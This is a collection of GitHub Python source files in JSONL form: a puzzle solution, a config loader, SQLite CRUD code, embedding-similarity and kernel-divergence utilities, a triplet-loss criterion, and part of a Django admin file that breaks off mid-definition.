+{"seq_id": "252430878", "text": "#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\n\"\"\"\nSolution for day 08 2017\n\"\"\"\n\n__author__ = 'Guido Minieri'\n__license__ = 'GPL'\n\n\nwith open('input.txt', 'r') as f:\n data = f.read().splitlines()\n\nfrom collections import defaultdict as dd\nimport operator as o\n\nregs = dd(int)\n\noperators = {\n \">\": o.gt,\n \"<\": o.lt,\n \"==\": o.eq,\n \">=\": o.ge,\n \"<=\": o.le,\n \"!=\": o.ne\n}\n\nmaxes = []\n\ndef parseInst(instruction):\n oper, condition = instruction.split(' if ')\n target, operator, t_val = condition.split()\n reg, cmd, val = oper.split()\n return (reg, cmd, int(val),target, operator, int(t_val))\n\ndef command(reg, cmd, val):\n if cmd == \"inc\":\n regs[reg] += val\n else:\n regs[reg] -= val\n maxes.append(regs[reg])\n\nfor inst in data:\n reg, cmd, val, target, op, t_val = parseInst(inst)\n if operators[op](regs[target], t_val):\n command(reg, cmd, val)\n\nprint(max(regs.values()))\nprint(max(maxes))\n", "repo_name": "gmnr/advent-of-code", "sub_path": "2017/08/day08.py", "file_name": "day08.py", "file_ext": "py", "file_size_in_byte": 952, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "53", "api": [{"api_name": "collections.defaultdict", "line_number": 18, "usage_type": "call"}, {"api_name": "operator.gt", "line_number": 21, "usage_type": "attribute"}, {"api_name": "operator.lt", "line_number": 22, "usage_type": "attribute"}, {"api_name": "operator.eq", "line_number": 23, "usage_type": "attribute"}, {"api_name": "operator.ge", "line_number": 24, "usage_type": "attribute"}, {"api_name": "operator.le", "line_number": 25, "usage_type": "attribute"}, {"api_name": "operator.ne", "line_number": 26, "usage_type": "attribute"}]}
+{"seq_id": "14711535962", "text": "import os\n\nimport dotenv\n\ndotenv.load_dotenv()\n\n\nclass Config:\n def __init__(self) -> None:\n self.debug_mode = False\n self.openai_api_key = os.getenv(\"OPENAI_API_KEY\", \"\")\n self.node_red_server = os.getenv(\"NODE_RED_SERVER\", \"\")\n self.fast_llm_model = os.getenv(\"FAST_LLM_MODEL\", \"gpt-3.5-turbo\")\n self.smart_llm_model = os.getenv(\"SMART_LLM_MODEL\", \"gpt-4\")\n self.temperature = float(os.getenv(\"TEMPERATURE\", \"1\"))\n\n assert self.openai_api_key != \"\", \"OpenAI API key not found\"\n", "repo_name": "viact-ai/automate_chatgpt_nodered", "sub_path": "utils/config.py", "file_name": "config.py", "file_ext": "py", "file_size_in_byte": 531, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "53", "api": [{"api_name": "dotenv.load_dotenv", "line_number": 5, "usage_type": "call"}, {"api_name": "os.getenv", "line_number": 11, "usage_type": "call"}, {"api_name": "os.getenv", "line_number": 12, "usage_type": "call"}, {"api_name": "os.getenv", "line_number": 13, "usage_type": "call"}, {"api_name": "os.getenv", "line_number": 14, "usage_type": "call"}, {"api_name": "os.getenv", "line_number": 15, "usage_type": "call"}]}
+{"seq_id": "20366125819", "text": "\"\"\"\r\nImplementación de las operaciones CRUD (Create - Read - Update - Delete)\r\nCon SQLite3\r\n\"\"\"\r\n\r\nimport sqlite3 as dbapi\r\nfrom os.path import isfile\r\nfrom base_datos_objetos import Empleado, Categoria, Producto\r\n\r\nclass BaseDatos:\r\n \"\"\"\r\n Representa la conexión a la base de datos y define las operaciones CRUD (Create - Read - Update - Delete)\r\n para una entidad\r\n \"\"\"\r\n\r\n def __init__(self, path):\r\n self.conexion=None\r\n self.cur = None\r\n\r\n if not isfile(path):\r\n raise ValueError('El '+path+' no existe...')\r\n\r\n else:\r\n self.conexion=dbapi.connect(path)\r\n self.cur = self.conexion.cursor()\r\n\r\n def create(self, empleado):\r\n \"\"\"\r\n Da de alta un empleado en la base de datos\r\n \"\"\"\r\n sql = \"insert into empleados(id,nombre, cargo) values(?,?,?)\"\r\n t = empleado.getTupla()\r\n return self.__actualizar(sql, t)\r\n\r\n def delete(self, id):\r\n \"\"\"\r\n Borra un empleado por clave primaria\r\n \"\"\"\r\n sql = \"delete from empleados where id=?\"\r\n t = (id,) \r\n return self.__actualizar(sql, t)\r\n\r\n def update(self, empleado):\r\n \"\"\"\r\n Actualiza un empleado de la base de datos\r\n \"\"\"\r\n sql = \"update empleados set nombre=?, cargo=? where id=?\"\r\n t = empleado.getTupla2()\r\n return self.__actualizar(sql, t)\r\n\r\n def __actualizar(self, sql, t):\r\n \"\"\"\r\n Ejecuta una consulta de acción dentro de una trasacción\r\n \"\"\"\r\n try:\r\n self.cur.execute(sql, t)\r\n n = self.cur.rowcount\r\n self.conexion.commit()\r\n return n\r\n\r\n except Exception as e:\r\n self.conexion.rollback()\r\n raise e\r\n\r\n def read(self, id):\r\n \"\"\"\r\n Devuelve un empleado de la base de datos\r\n \"\"\"\r\n sql = \"select * from empleados where id=?\"\r\n self.cur.execute(sql, (id,))\r\n t = self.cur.fetchone()\r\n if not t:\r\n raise ValueError('El id '+str(id)+ ' no existe en la base de datos')\r\n else:\r\n return Empleado(*t)\r\n\r\n def selectEmpleados(self, cargo=None):\r\n \"\"\"\r\n Devuelve una colección de objetos empleado\r\n \"\"\"\r\n empleados = []\r\n sql = \"select id,nombre,cargo from empleados\"\r\n if not cargo: \r\n self.cur.execute(sql)\r\n else:\r\n sql += \" where cargo like ?\"\r\n self.cur.execute(sql, (\"%\"+cargo+\"%\",))\r\n\r\n for t in self.cur.fetchall():\r\n empleado = Empleado(*t)\r\n empleados.append(empleado)\r\n return empleados\r\n\r\n def query(self, sql):\r\n self.cur.execute(sql)\r\n cabs = \";\".join([t[0] for t in self.cur.description])\r\n print(cabs)\r\n for t in self.cur.fetchall():\r\n linea = \";\".join([str(col) for col in t]) \r\n print(linea)\r\n\r\n def __del__(self):\r\n if self.cur: self.cur.close()\r\n if self.conexion: self.conexion.close()\r\n\r\nif __name__ == '__main__':\r\n try:\r\n bd = BaseDatos(\"../bd/empresa3.db\")\r\n #bd.query(\"select * from pedidos\")\r\n empleados = bd.selectEmpleados('ventas')\r\n for e in empleados:\r\n print(e)\r\n\r\n empleado = bd.read(4)\r\n print(empleado)\r\n empleado.cargo = \"Gerente de ventas\"\r\n bd.update(empleado)\r\n\r\n emp = bd.read(4)\r\n print(emp)\r\n\r\n #empleado = Empleado(50, \"Sandra Gonzalez\", \"Directivo de ventas\")\r\n #bd.create(empleado)\r\n\r\n \"\"\"\r\n if bd.delete(1):\r\n print('Registro borrado')\r\n else:\r\n print('No se ha podido eliminar')\r\n \"\"\"\r\n\r\n except Exception as e:\r\n print(e)\r\n", "repo_name": "aldebarran22/curso_santander_1", "sub_path": "codigo_feb_1/conexion_basedatos.py", "file_name": "conexion_basedatos.py", "file_ext": 
"py", "file_size_in_byte": 3782, "program_lang": "python", "lang": "es", "doc_type": "code", "stars": 3, "dataset": "github-code", "pt": "53", "api": [{"api_name": "os.path.isfile", "line_number": 20, "usage_type": "call"}, {"api_name": "sqlite3.connect", "line_number": 24, "usage_type": "call"}, {"api_name": "base_datos_objetos.Empleado", "line_number": 75, "usage_type": "call"}, {"api_name": "base_datos_objetos.Empleado", "line_number": 90, "usage_type": "call"}]}
+{"seq_id": "5457451761", "text": "from typing import Iterable, List, Tuple, NamedTuple, Union, Optional, Dict\n\nimport numpy as np\nfrom tqdm import tqdm\n\nfrom . import Embeddings\n\n\nclass EmbeddingSimilarity(NamedTuple):\n rank: int\n word: str\n similarity: float\n vec: np.ndarray\n\n\nMostSimilarResult = List[EmbeddingSimilarity]\nWordOrVec = Union[str, np.ndarray]\n\n\nclass Matrix:\n \"\"\" Transforms a lookup-based Embeddings object into a classical embedding matrix by looking up a fixed vocabulary\n and storing the results. The matrix can then be used for distance measuring.\n \"\"\"\n\n def __init__(self, lookup_embeddings: Embeddings, vocab: Optional[Iterable[str]] = None,\n precomputed_word2ind: Optional[Dict[str, int]] = None, precomputed_matrix: Optional[np.ndarray] = None,\n verbose: bool = False) -> None:\n \"\"\" Initialize the Matrix object.\n\n :param lookup_embeddings: the embeddings object used for lookup\n :param vocab: an iterable containing the words that should be stored in the matrix\n :param precomputed_word2ind: a precomputed word2ind dict, e.g. from the fastText .vec file\n :param precomputed_matrix: a precomputed embedding matrix, e.g. from the fastText .vec file\n :param verbose: setting this to True will show a progress bar when first looking up embeddings as well as output\n means when computing distances\n \"\"\"\n self.verbose = verbose\n self.lookup_embeddings = lookup_embeddings\n\n if vocab is not None:\n self._init_from_vocab(lookup_embeddings, vocab=vocab)\n elif precomputed_word2ind is not None and precomputed_matrix is not None:\n self._init_from_word2ind_and_matrix(precomputed_word2ind, precomputed_matrix)\n else:\n raise ValueError('The Matrix needs to be initialized either with vocab or word2ind+matrix')\n\n def _init_from_vocab(self, lookup_embeddings, vocab):\n vocab = set(vocab)\n self.vocab_size = len(vocab)\n self.word2ind = {word: i for i, word in enumerate(vocab)}\n self.ind2word = {i: word for i, word in enumerate(vocab)}\n self.embedding_matrix = np.zeros((self.vocab_size, lookup_embeddings.size))\n self.is_norm = False\n\n items: Iterable[Tuple[str, int]] = self.word2ind.items()\n if self.verbose:\n items = tqdm(items, desc='Looking up embeddings')\n for word, ind in items:\n looked_up = lookup_embeddings.lookup(word)\n if np.count_nonzero(looked_up) > 0:\n self.embedding_matrix[ind] = looked_up\n else:\n # this shouldn't happen anymore\n raise RuntimeError(f'Embedding vector for {word} is all zeros')\n\n def _init_from_word2ind_and_matrix(self, word2ind, matrix):\n self.vocab_size = len(word2ind)\n self.word2ind = word2ind\n self.ind2word = {i: word for word, i in self.word2ind.items()}\n self.embedding_matrix = matrix\n self.is_norm = True\n\n def init_norms(self, force: bool = False) -> None:\n \"\"\" Initializes self.norms with pre-computed L2 normalized vectors for cosine distance computation.\n\n :param force: setting this to True will update the norms even if they were already computed\n :return: None\n \"\"\"\n if not self.is_norm or force:\n # noinspection PyAttributeOutsideInit\n self.embedding_matrix = self.embedding_matrix / np.sqrt((self.embedding_matrix ** 2).sum(-1))[\n ..., np.newaxis]\n self.is_norm = True\n\n def _most_similar_cosine_measurement(self, vec):\n self.init_norms()\n normalized_vec = vec / np.linalg.norm(vec)\n return np.dot(self.embedding_matrix, normalized_vec)\n\n def most_similar_cosine(self, word_or_vec: WordOrVec, n: int = 20) -> MostSimilarResult:\n \"\"\" Calculate the cosine distance of the 
input vector to all vectors in the embedding matrix and return the\n        most similar ones.\n\n        :param word_or_vec: the input word or vector\n        :param n: the number of results to return, or None if all should be returned\n        :return: a list of MostSimilarResult objects\n        \"\"\"\n        return self._generic_most_similar(word_or_vec, self._most_similar_cosine_measurement,\n                                          higher_is_more_similar=True, n=n)\n\n    def cosine_distance_rank(self, word_or_vec: WordOrVec, word):\n        return self._generic_rank(word_or_vec, word, self._most_similar_cosine_measurement, higher_is_more_similar=True)\n\n    def cosine_distance(self, vec: np.ndarray, word: str) -> float:\n        \"\"\" Returns the cosine distance between an input word and vector.\n\n        :param vec: the input vector\n        :param word: the input word\n        :return: a float between -1 and 1\n        \"\"\"\n        self.init_norms()\n        normalized_vec = vec / np.linalg.norm(vec)\n        return float(np.dot(self.embedding_matrix[self.word2ind[word]], normalized_vec))\n\n    def most_similar_l2(self, word_or_vec: WordOrVec, n: int = 20) -> MostSimilarResult:\n        \"\"\" Calculate the L2 norm distance of the input vector to all vectors in the embedding matrix and return the\n        most similar ones.\n\n        :param word_or_vec: the input word or vector\n        :param n: the number of results to return, or None if all should be returned\n        :return: a list of EmbeddingSimilarity objects, with lower distance meaning more similar\n        \"\"\"\n\n        def measurement(vec):\n            distances = np.zeros(self.vocab_size)\n            for i, emb in enumerate(self.embedding_matrix):\n                distances[i] = np.linalg.norm(vec - emb)\n            return distances\n\n        return self._generic_most_similar(word_or_vec, measurement, higher_is_more_similar=False, n=n)\n\n    def _lookup_if_needed(self, word_or_vec: WordOrVec) -> np.ndarray:\n        if type(word_or_vec) == str:\n            return self.lookup_embeddings.lookup(word_or_vec)\n        else:\n            return word_or_vec\n\n    def _generic_most_similar(self, word_or_vec: WordOrVec, measurement, higher_is_more_similar, n: int = 20):\n        self.init_norms()\n        vec = self._lookup_if_needed(word_or_vec)\n        distances = measurement(vec)\n        assert len(distances) == len(self.embedding_matrix)\n        if self.verbose:\n            print('mean distance', np.mean(distances))\n\n        distances_for_sorting = -distances if higher_is_more_similar else distances\n\n        if n is None or n == len(self.embedding_matrix):\n            sorted_most_similar_ind = np.argsort(distances_for_sorting)\n        else:\n            most_similar_ind = np.argpartition(distances_for_sorting, n)[:n]\n            sorted_most_similar_ind = most_similar_ind[np.argsort(distances_for_sorting[most_similar_ind])]\n\n        return [EmbeddingSimilarity(rank=rank,\n                                    word=self.ind2word[ind],\n                                    similarity=distances[ind],\n                                    vec=self.embedding_matrix[ind])\n                for rank, ind in enumerate(sorted_most_similar_ind, start=1)]\n\n    def _generic_rank(self, word_or_vec: WordOrVec, word, measurement, higher_is_more_similar):\n        self.init_norms()\n        vec = self._lookup_if_needed(word_or_vec)\n        distances = measurement(vec)\n        distances = -distances if higher_is_more_similar else distances\n\n        word_distance = distances[self.word2ind[word]]\n        return np.count_nonzero(distances < word_distance) + 1\n", "repo_name": "maxfriedrich/deid-training-data", "sub_path": "deid/embeddings/matrix.py", "file_name": "matrix.py", "file_ext": "py", "file_size_in_byte": 7525, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 17, "dataset": "github-code", "pt": "53", "api": [{"api_name": "typing.NamedTuple", "line_number": 9, "usage_type": "name"}, {"api_name": "numpy.ndarray", "line_number": 13, 
"usage_type": "attribute"}, {"api_name": "typing.List", "line_number": 16, "usage_type": "name"}, {"api_name": "typing.Union", "line_number": 17, "usage_type": "name"}, {"api_name": "numpy.ndarray", "line_number": 17, "usage_type": "attribute"}, {"api_name": "typing.Optional", "line_number": 25, "usage_type": "name"}, {"api_name": "typing.Iterable", "line_number": 25, "usage_type": "name"}, {"api_name": "typing.Optional", "line_number": 26, "usage_type": "name"}, {"api_name": "typing.Dict", "line_number": 26, "usage_type": "name"}, {"api_name": "numpy.ndarray", "line_number": 26, "usage_type": "attribute"}, {"api_name": "numpy.zeros", "line_number": 52, "usage_type": "call"}, {"api_name": "typing.Iterable", "line_number": 55, "usage_type": "name"}, {"api_name": "typing.Tuple", "line_number": 55, "usage_type": "name"}, {"api_name": "tqdm.tqdm", "line_number": 57, "usage_type": "call"}, {"api_name": "numpy.count_nonzero", "line_number": 60, "usage_type": "call"}, {"api_name": "numpy.sqrt", "line_number": 81, "usage_type": "call"}, {"api_name": "numpy.newaxis", "line_number": 82, "usage_type": "attribute"}, {"api_name": "numpy.linalg.norm", "line_number": 87, "usage_type": "call"}, {"api_name": "numpy.linalg", "line_number": 87, "usage_type": "attribute"}, {"api_name": "numpy.dot", "line_number": 88, "usage_type": "call"}, {"api_name": "numpy.ndarray", "line_number": 104, "usage_type": "attribute"}, {"api_name": "numpy.linalg.norm", "line_number": 112, "usage_type": "call"}, {"api_name": "numpy.linalg", "line_number": 112, "usage_type": "attribute"}, {"api_name": "numpy.dot", "line_number": 113, "usage_type": "call"}, {"api_name": "numpy.zeros", "line_number": 125, "usage_type": "call"}, {"api_name": "numpy.linalg.norm", "line_number": 127, "usage_type": "call"}, {"api_name": "numpy.linalg", "line_number": 127, "usage_type": "attribute"}, {"api_name": "numpy.ndarray", "line_number": 132, "usage_type": "attribute"}, {"api_name": "numpy.mean", "line_number": 144, "usage_type": "call"}, {"api_name": "numpy.argsort", "line_number": 149, "usage_type": "call"}, {"api_name": "numpy.argpartition", "line_number": 151, "usage_type": "call"}, {"api_name": "numpy.argsort", "line_number": 152, "usage_type": "call"}, {"api_name": "numpy.count_nonzero", "line_number": 167, "usage_type": "call"}]}
+{"seq_id": "9922483230", "text": "import numpy as np\nimport scipy.stats as scs\nimport kernels as kl\n\n\n######## MMD ##########\n\ndef MMD(x,y,k):\n n = len(x)\n Kxx = np.array([[k(x[i],x[j]) for i in range(n)] for j in range(n)])\n Kyy = np.array([[k(y[i],y[j]) for i in range(n)] for j in range(n)])\n Kxy = np.array([[k(x[i],y[j]) for i in range(n)] for j in range(n)])\n A = 1/((n-1)*n) * (np.sum(Kxx) - np.sum(np.diag(Kxx)))\n C = 1/((n-1)*n) * (np.sum(Kyy) - np.sum(np.diag(Kyy)))\n B = 1/n**2* np.sum(Kxy)\n return A - B + C\n\n\n#gradient in x of MMD \ndef grad_MMD(x,y,k,dk):\n d = len(x[0])\n n = len(x)\n m = len(y)\n dKx = np.array([[dk(x[i],x[j]) for j in range(n)] for i in range(n)])\n dKx[:,:,0] = dKx[:,:,0] - np.diag(np.diag(dKx[:,:,0]))\n dKx[:,:,1] = dKx[:,:,1] - np.diag(np.diag(dKx[:,:,1]))\n dKy = np.array([[dk(x[i],y[j]) for j in range(m)] for i in range(n)])\n R = np.zeros((n,d))\n R[:,0] = 2/(n * (n-1)) * dKx[:,:,0] @ np.ones(n) - 2/m**2 * dKy[:,:,0] @ np.ones(m)\n R[:,1] = 2/(n * (n-1)) * dKx[:,:,1] @ np.ones(n) - 2/m**2 * dKy[:,:,1] @ np.ones(m)\n return R\n\n\n\ndef log_ou_0(t):\n t_log = np.zeros(len(t))\n for i in range(len(t)):\n if t[i] > 0:\n t_log[i] = np.log(t[i])\n return t_log\n\n\n\n\n####### KKL ########\n\n\ndef KKL(x,y,k,Packy):\n n = len(x)\n m = len(y)\n Kx = 1/n * np.array([[k(x[i],x[j]) for i in range(n)] for j in range(n)])\n Ky = Packy[0] #1/m * np.array([[k(y[i],y[j]) for i in range(m)] for j in range(m)])\n regx = 1e-9*np.eye(n)\n regy = 1e-9*np.eye(m)\n #Kx = Kx +regx\n #Ky = Ky+regy\n Lx,U = np.linalg.eig(Kx)\n U = np.real(U).transpose()\n Lx = np.real(Lx)\n Ly,V = Packy[1], Packy[2] #np.linalg.eig(Ky)\n #V = np.real(V).transpose()\n #Ly = np.real(Ly)\n Trxy = 0\n Kxy = np.array([[k(x[i],y[j]) for j in range(m)] for i in range(n)])\n Trxx = np.sum(Lx * log_ou_0(Lx))\n for s in range(n):\n for t in range(m):\n Trxy = Trxy + log_ou_0([Ly[t]])[0] / Ly[t] * (U[s] @ Kxy @ V[t])**2 \n Trxx = np.sum(Lx * log_ou_0(Lx))\n \n return Trxx - 1/(n*m) * Trxy\n\n#Wasserstein Gradient of KKL\ndef WGrad_KKL(w,x,y,k,dk,Packy):\n n = len(x)\n m = len(y)\n Kx = 1/n * np.array([[k(x[i],x[j]) for i in range(n)] for j in range(n)])\n Ky = Packy[0] #1/m * np.array([[k(y[i],y[j]) for i in range(m)] for j in range(m)])\n Lx,U = np.linalg.eig(Kx)\n U = U.transpose()\n Lx = np.real(Lx)\n Ly,V = Packy[1], Packy[2] #np.linalg.eig(Ky)\n #V = V.transpose()\n #Ly = np.real(Ly)\n Kwx = np.array([k(w,x[i]) for i in range(n)]).transpose()\n Kwy = np.array([k(w,y[j]) for j in range(m)]).transpose()\n DKx = np.array([dk(w,x[i]) for i in range(n)]).transpose()\n DKy = np.array([dk(w,y[j]) for j in range(m)]).transpose()\n Trwx = 0\n Trwy = 0 \n for s in range(n):\n Trwx = Trwx + log_ou_0([Lx[s]])[0] / Lx[s] * 2 * (U[s] @ Kwx)* (DKx @ U[s]) \n #print(U[s] @ (n * Kx) @ U[s])\n for t in range(m):\n Trwy = Trwy + log_ou_0([Ly[t]])[0] / Ly[t] * 2 * (V[t] @ Kwy)* (DKy @ V[t]) \n return 1/n * Trwx - 1/ m * Trwy\n \n \n \n \n\n\n######## Kernel density estimation ###############\n\n#base distribution sample\nx_tau = scs.multivariate_normal.rvs(np.zeros(2),np.identity(2),100) \n\n\ndef h(x,y,k):\n return np.mean(np.array([k(x,x_tau[i]) * k(y,x_tau[i]) * np.exp(np.linalg.norm(x_tau[i])) /(np.sqrt(2 * np.pi)) for i in range(len(x_tau))]))\n \n \n\ndef DE(x,k,y):\n n = len(x)\n return 1/n * np.sum(np.array([h(x[i],y,k) for i in range(n)]))\n\ndef KDE(x, y, k):\n n = len(x)\n Q = np.array([DE(x,k,x[i]) for i in range(n)])\n P = np.array([DE(y,k,x[i]) for i in range(n)])\n return 1/n * 
np.sum(np.log(Q) * Q - np.log(P) * Q)\n \n \n \n######### TRACE #######################\n\ndef K_trace(x,k):\n n = len(x)\n Kx = 1/n * np.array([[k(x[i],x[j]) for i in range(n)] for j in range(n)])\n Lambdx,_ = np.linalg.eig(Kx)\n return np.sum(Lambdx)\n \n\n\n", "repo_name": "cclementine25/KKL_div", "sub_path": "divergences.py", "file_name": "divergences.py", "file_ext": "py", "file_size_in_byte": 3976, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "53", "api": [{"api_name": "numpy.array", "line_number": 10, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 11, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 12, "usage_type": "call"}, {"api_name": "numpy.sum", "line_number": 13, "usage_type": "call"}, {"api_name": "numpy.diag", "line_number": 13, "usage_type": "call"}, {"api_name": "numpy.sum", "line_number": 14, "usage_type": "call"}, {"api_name": "numpy.diag", "line_number": 14, "usage_type": "call"}, {"api_name": "numpy.sum", "line_number": 15, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 24, "usage_type": "call"}, {"api_name": "numpy.diag", "line_number": 25, "usage_type": "call"}, {"api_name": "numpy.diag", "line_number": 26, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 27, "usage_type": "call"}, {"api_name": "numpy.zeros", "line_number": 28, "usage_type": "call"}, {"api_name": "numpy.ones", "line_number": 29, "usage_type": "call"}, {"api_name": "numpy.ones", "line_number": 30, "usage_type": "call"}, {"api_name": "numpy.zeros", "line_number": 36, "usage_type": "call"}, {"api_name": "numpy.log", "line_number": 39, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 51, "usage_type": "call"}, {"api_name": "numpy.eye", "line_number": 53, "usage_type": "call"}, {"api_name": "numpy.eye", "line_number": 54, "usage_type": "call"}, {"api_name": "numpy.linalg.eig", "line_number": 57, "usage_type": "call"}, {"api_name": "numpy.linalg", "line_number": 57, "usage_type": "attribute"}, {"api_name": "numpy.real", "line_number": 58, "usage_type": "call"}, {"api_name": "numpy.real", "line_number": 59, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 64, "usage_type": "call"}, {"api_name": "numpy.sum", "line_number": 65, "usage_type": "call"}, {"api_name": "numpy.sum", "line_number": 69, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 77, "usage_type": "call"}, {"api_name": "numpy.linalg.eig", "line_number": 79, "usage_type": "call"}, {"api_name": "numpy.linalg", "line_number": 79, "usage_type": "attribute"}, {"api_name": "numpy.real", "line_number": 81, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 85, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 86, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 87, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 88, "usage_type": "call"}, {"api_name": "scipy.stats.multivariate_normal.rvs", "line_number": 106, "usage_type": "call"}, {"api_name": "scipy.stats.multivariate_normal", "line_number": 106, "usage_type": "attribute"}, {"api_name": "scipy.stats", "line_number": 106, "usage_type": "name"}, {"api_name": "numpy.zeros", "line_number": 106, "usage_type": "call"}, {"api_name": "numpy.identity", "line_number": 106, "usage_type": "call"}, {"api_name": "numpy.mean", "line_number": 110, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 110, "usage_type": "call"}, {"api_name": "numpy.exp", 
"line_number": 110, "usage_type": "call"}, {"api_name": "numpy.linalg.norm", "line_number": 110, "usage_type": "call"}, {"api_name": "numpy.linalg", "line_number": 110, "usage_type": "attribute"}, {"api_name": "numpy.sqrt", "line_number": 110, "usage_type": "call"}, {"api_name": "numpy.pi", "line_number": 110, "usage_type": "attribute"}, {"api_name": "numpy.sum", "line_number": 116, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 116, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 120, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 121, "usage_type": "call"}, {"api_name": "numpy.sum", "line_number": 122, "usage_type": "call"}, {"api_name": "numpy.log", "line_number": 122, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 130, "usage_type": "call"}, {"api_name": "numpy.linalg.eig", "line_number": 131, "usage_type": "call"}, {"api_name": "numpy.linalg", "line_number": 131, "usage_type": "attribute"}, {"api_name": "numpy.sum", "line_number": 132, "usage_type": "call"}]}
+{"seq_id": "40398025849", "text": "# -*- coding: utf-8 -*-\n\nimport math\n\nimport torch\n\nfrom ncc.criterions import NccCriterion\nfrom ncc.data.constants import EPS\nfrom ncc.utils.logging import metrics\n\n\nclass TripletCriterion(NccCriterion):\n def __init__(self, task, sentence_avg):\n super().__init__(task)\n self.sentence_avg = sentence_avg\n self.margin = self.task.args['optimization']['margin']\n\n def forward(self, model, sample, reduce=True):\n \"\"\"Compute the loss for the given sample.\n\n Returns a tuple with three elements:\n 1) the loss\n 2) the sample size, which is used as the denominator for the gradient\n 3) logging outputs to display while training\n \"\"\"\n net_output = model(**sample['net_input'])\n loss, _ = self.compute_loss(model, net_output, reduce=reduce)\n sample_size = sample['target'].size(0) if self.sentence_avg else sample['ntokens']\n logging_output = {\n 'loss': loss.data,\n 'ntokens': sample_size,\n 'nsentences': sample_size,\n 'sample_size': sample_size,\n }\n return loss, sample_size, logging_output\n\n def compute_loss(self, repr, equal_ids):\n distance = torch.norm(repr.unsqueeze(dim=0) - repr.unsqueeze(dim=1), dim=-1, p=1) # B x B\n max_pos_distance = (distance * equal_ids).max(dim=-1)[0]\n neg_filter = distance <= (max_pos_distance + self.margin).unsqueeze(dim=-1)\n pos_mask = equal_ids + torch.eye(*equal_ids.size()).type_as(distance)\n neg_filter = neg_filter * (1 - pos_mask)\n avg_neg_distance = (distance * neg_filter).sum(dim=-1) / (neg_filter.sum(dim=-1) + EPS)\n min_neg_distance = (distance + pos_mask * 99999).min(dim=-1)[0]\n pos_filter = (distance >= (min_neg_distance - self.margin).unsqueeze(dim=-1)).type_as(distance)\n pos_filter = pos_filter * equal_ids\n avg_pos_distance = (distance * pos_filter).sum(dim=-1) / (pos_filter.sum(dim=-1) + EPS)\n triplet_loss = 0.5 * torch.relu(avg_pos_distance - min_neg_distance + self.margin) + \\\n 0.5 * torch.relu(max_pos_distance - avg_neg_distance + self.margin)\n triplet_loss = triplet_loss.sum()\n return triplet_loss, None\n\n @staticmethod\n def reduce_metrics(logging_outputs) -> None:\n \"\"\"Aggregate logging outputs from data parallel training.\"\"\"\n loss_sum = sum(log.get('loss', 0) for log in logging_outputs)\n # ntokens = sum(log.get('ntokens', 0) for log in logging_outputs)\n sample_size = sum(log.get('sample_size', 0) for log in logging_outputs)\n metrics.log_scalar('loss', loss_sum / sample_size / math.log(2), sample_size, round=3)\n\n @staticmethod\n def logging_outputs_can_be_summed() -> bool:\n \"\"\"\n Whether the logging outputs returned by `forward` can be summed\n across workers prior to calling `reduce_metrics`. 
Setting this\n        to True will improve distributed training speed.\n        \"\"\"\n        return True\n", "repo_name": "CGCL-codes/naturalcc", "sub_path": "ncc/criterions/type_prediction/_triplet.py", "file_name": "_triplet.py", "file_ext": "py", "file_size_in_byte": 3002, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 220, "dataset": "github-code", "pt": "53", "api": [{"api_name": "ncc.criterions.NccCriterion", "line_number": 12, "usage_type": "name"}, {"api_name": "torch.norm", "line_number": 38, "usage_type": "call"}, {"api_name": "torch.eye", "line_number": 41, "usage_type": "call"}, {"api_name": "ncc.data.constants.EPS", "line_number": 43, "usage_type": "name"}, {"api_name": "ncc.data.constants.EPS", "line_number": 47, "usage_type": "name"}, {"api_name": "torch.relu", "line_number": 48, "usage_type": "call"}, {"api_name": "torch.relu", "line_number": 49, "usage_type": "call"}, {"api_name": "ncc.utils.logging.metrics.log_scalar", "line_number": 59, "usage_type": "call"}, {"api_name": "ncc.utils.logging.metrics", "line_number": 59, "usage_type": "name"}, {"api_name": "math.log", "line_number": 59, "usage_type": "call"}]}
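For intuition, the hardest-positive/hinge pieces of compute_loss on a toy 2x2 batch (the margin and distance values are illustrative only):

    import torch
    distance = torch.tensor([[0.0, 2.0], [2.0, 0.0]])   # pairwise L1 distances, B x B
    equal_ids = torch.tensor([[0.0, 1.0], [1.0, 0.0]])  # 1 where two samples share a label
    max_pos = (distance * equal_ids).max(dim=-1)[0]     # hardest positive per row -> [2., 2.]
    print(torch.relu(max_pos - 1.0 + 0.5))              # hinge against a negative at distance 1, margin 0.5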
+{"seq_id": "74549878889", "text": "from django.contrib import admin\nfrom django.utils.html import mark_safe\nfrom . import models\n\n\n@admin.register(models.RoomType, models.Facility, models.HouseRule, models.Amenity)\nclass ItemAdmin(admin.ModelAdmin):\n\n \"\"\" item Admin Definition \"\"\"\n\n list_display = (\"name\", \"used_by\")\n\n def used_by(self, obj):\n return obj.rooms.count()\n\n\n# https://docs.djangoproject.com/en/3.0/ref/contrib/admin/#django.contrib.admin.TabularInline\nclass PhotoInLine(admin.TabularInline):\n model = models.Photo\n\n\n# ↑ 와 같음 보이는방식이 다름\n# class PhotoInLine(admin.StackedInline):\n# model = models.Photo\n\n\n@admin.register(models.Room)\nclass RoomAdmin(admin.ModelAdmin):\n\n \"\"\" Room Admin Definition \"\"\"\n\n inlines = [\n PhotoInLine,\n ]\n\n # https://docs.djangoproject.com/en/3.0/ref/contrib/admin/#django.contrib.admin.ModelAdmin.fieldsets\n fieldsets = (\n (\n \"Basic Info\",\n {\"fields\": (\"name\", \"description\", \"country\", \"city\", \"address\", \"price\")},\n ),\n (\"Times\", 